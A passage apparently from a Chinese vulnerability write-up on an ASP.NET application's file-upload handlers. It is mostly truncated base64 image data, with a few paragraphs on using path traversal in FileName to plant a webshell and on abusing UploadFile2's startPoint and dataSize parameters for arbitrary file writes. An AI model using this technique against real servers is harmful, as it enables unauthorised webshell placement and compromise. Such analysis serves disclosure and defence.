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
<p blockindex=35>在<code>web.config</code>中定义了各个值对应的路径，但是程序实在manage里，如果上传到这些目录也无法访问到</p>
<p blockindex=36><img src=data:image/png;base64,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
<p blockindex=37>所以这里的FileName需要通过路径穿越到web目录。最后<code>memoryStream.WriteTo(fileStream);</code>将webshell写入</p>
<h1 blockindex=38>0x03 more</h1>
<h2 blockindex=39>1、任意文件写入</h2>
<p blockindex=40>在分析这个漏洞的时候，发现在这个控制器下还有四个类似上传方法</p>
<p blockindex=41><img src=data:image/png;base64,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
<p blockindex=42>这里找到一处UploadFile2，这里获取路径的方式是通过pathType控制，但是多了两个参数startPoint和dataSize</p>
<p blockindex=43><img src="data:image/png;base64,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
<p blockindex=44>这里会判断startPoint是否为0，如果0就直接写入文件，如果不为0，则需要被写入的文件存在，且startPoint的值必须为被写入文件的长度，然后通过append追加的方式写入，然后datasize是写入的位数，需要与写入文件的字符个数相同。</p>
<p blockindex=45><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAA1kAAAKFCAIAAACx6LSEAAAgAElEQVR4nO3dT4hlyZ3Y+2i7GMYWnoF58HiTDNn0aPN68ejeGFLg1eUNyo0ZGV6Ro8V0IS10UYJL1qawEJSYAtOmFpa7DVekFxL3ycMYamG9XZmBszIowZvSSotkbNTZtLyxYWzKbgYa3iKmY6LjFxHnF+dEnHPuOd8PRXFu3DgRcc+9mfeX8efEG+fn5wYY5O9+6e+c//7Z3K2Ywkf/6ZP/+fp/zd0KAADqezB3A3DCzn//7H//w6//99f/be6GtPVbX/qdw27397/xr4L0v/erfzdLewAAJ+1/vPmPZOKM3ynEghjlv7/+b//1L//L3K0AAAAD/a25GwCcnv/4k3/cuoruc9GHAICTNsH3iF61fsGLpy+NMbfPLqPpqadkYq93X3zoP3z18HFpCWM0qt0VW1Rg13W73S515fWi75EtvPfc/+8v/6k9+Afmn/wH8y/dcTRzbwYlW45fo+OX/B/Mvwwe6mvPZP6PP/nHdrx4/JXP86+/PdbHgi6n5k1Uyvwsr4C8tspLZ0+seJ17DfvN2avFZyYoWZY//dUbqeLFj/445y+Of0rvRXOZP/7449/7vd/Tn9hOo4/uGPYqffzxx++99170KV/dS/f3v/Gv3LfJ7Kr1C6be4Ntnl5mnBlRko6VXDx/bf0FwJvVmaFq7vthoFJgp38Vq43+0ou/RbrfTRB5/+Nv/3HweMPn/R/0D809GRoGuHP/AFitLDlL0tdsg0v6T4aZTeuVdLNWa/xVSsSsx87M8mVqdo7Ic91t+t9sVXTqXf1i9AyjfhdLPW6NX4T6N0fKLrl4jRReq4o+A/MjJDEF60eWSf0yaucPuRh9dvcwPftTz58+NMR9//HGj9iwH8wVPkrLTbiQbDs7+m1qvSqCZt5w/4zRO6L3DFvCBzODiLI19R548eWKavTvL6RrsiQWD8NwG9f7QWDBMphxFSmXzq8uXEB1UDRLdQ3vgJ2aOMwdFtQeJsihZbPQFymzR+Cx6SfWJKcPCwaAvrTdEiw7I5hOjhbicI4eDi2LK4Hr6D+Vft3JYue7Aq/8nb36AydT77Ra9Au7lR1+s6Xu9sqn6l+bSbeLz58/tb3NNOZr2BOVrKjV9b42S/LREr7bLppzGkOrkky9ww